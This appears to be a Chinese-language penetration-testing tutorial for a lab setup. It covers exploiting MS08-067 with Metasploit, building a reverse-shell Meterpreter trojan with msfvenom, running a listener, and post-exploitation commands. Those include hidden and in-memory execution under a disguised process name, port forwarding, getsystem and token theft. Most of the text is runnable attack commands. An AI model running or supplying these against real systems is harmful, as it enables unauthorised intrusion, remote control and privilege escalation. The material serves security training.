⭐【msf】 msfconsole meterpreter
對於這款強大滲透測試框架,詳情介紹可看這里:metasploit 使用教程
對於msfconsole, Kali Linux 自帶。只需用命令行啟動便可。
⭐msfconsole 啟動不了/初次使用
service postgresql start # 啟動數據庫服務
msfdb init # 初始化數據庫
msfconsole # 啟動metasploit
【注】msfconsole 不會就用 msfconsole -h msf5 > help 查看幫助
⭐ms08-067漏洞攻擊實踐
用 ifconfig 命令 可 查看kail 系統ip ipconfig 查看 Windows ip
kali: 192.168.xxx.xxx (攻擊靶機)
windows xp xxx : 192.168.xxx.xxx (被攻擊靶機)
msfconsole - 進入
msfconsole

紅框中 標記的是:Metasploit所有的利用模塊、payload、post模塊等等模塊
search - 查看漏洞
search ms08_067

use - 使用漏洞
use exploit/windows/smb/ms08_067_netapi
show - 查看可以攻擊的靶機操作系統型號(targets)
show targets
set - 設置target 參數
xx是對應被攻擊靶機的型號
set target xx
set - 設置rhost參數
此ip為被攻擊靶機的ip地址
set rhost 192.168.xxx.xxx
show - 查看參數
show options

exploit - 進行攻擊
exploit

session 查看目前服務器端會話
sessions -i
啟動x會話 。
sessions -i x
之后用 meterpreter 命令,轉 shell 命令
shell
back - 實現返回
back

查看 payload
show payloads
⭐利用msfvenom生成木馬攻擊靶場
【參考鏈接】: i春秋 Meterpreter綜合提權
msfvenom 生成 .exe 文件
msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.xxx.xxx lport=yyyy -f exe -o /tmp/muma.exe
windows/meterpreter/reverse_tcp : payload
lhost :木馬反彈到的監聽端地址=192.168.xxx.xxx
lport :監聽端口=yyyy
常見 msfvenom 命令參數如下:
-p 選擇一個載荷(payload)
-l 載荷列表
-f 生成的文件格式
-e 編碼方式
-i 編碼次數
-b 在生成的程序中避免出現的值
-h 幫助
用msfconsole監聽
選用 exploit/multi/handler 監聽模塊
use exploit/multi/handler
設置payload:
set payload windows/x64/meterpreter/reverse_tcp
設置 監聽ip地址以及監聽端口:
set lhost 192.168.xxx.xxx
set lport yyyy
查看設置參數:
show options
開啟配置模塊進行監聽
exploit
⭐Meterpreter
常見命令
upload - 上傳文件
上傳1.txt到目標靶機c:\muma\下
upload 1.txt c:\\muma\\
download - 下載目標靶機相對應權限的任意路徑下的文件
命令download file path
download c:\\muma\\1.txt
sysinfo命令:
顯示遠程主機的系統信息,顯示計算機、系統信息、結構、語言等信息。
運行目標主機上的cmd.exe程序,以隱藏的方式直接交互到meterpreter會話上
execute -H -i -f cmd.exe
execute -H -m -d notepad.exe-f muma.exe -a "-o muma.txt" -d 在目標主機執行時顯示的進程名稱(用以偽裝) -m 直接從內存中執行 "-o muma.txt"是muma.exe的運行參數
網絡命令
portfwd命令:
portfwd add -l yyyy -p zzzz -r 192.168.xxx.xxx # 端口轉發,本機監聽yyyy,把目標機zzzz轉到本機yyyy netstat -an | grep"yyyy" #查看指定端口開放情況
基礎提權
getsystem
利用 ps 命令查看目標靶機當前進程
找到管理員相應PID。若PID:xxxx
steal_token xxxx
#盜取guanliyuan
getuid
#檢查是否成功
shell
【侵權刪】
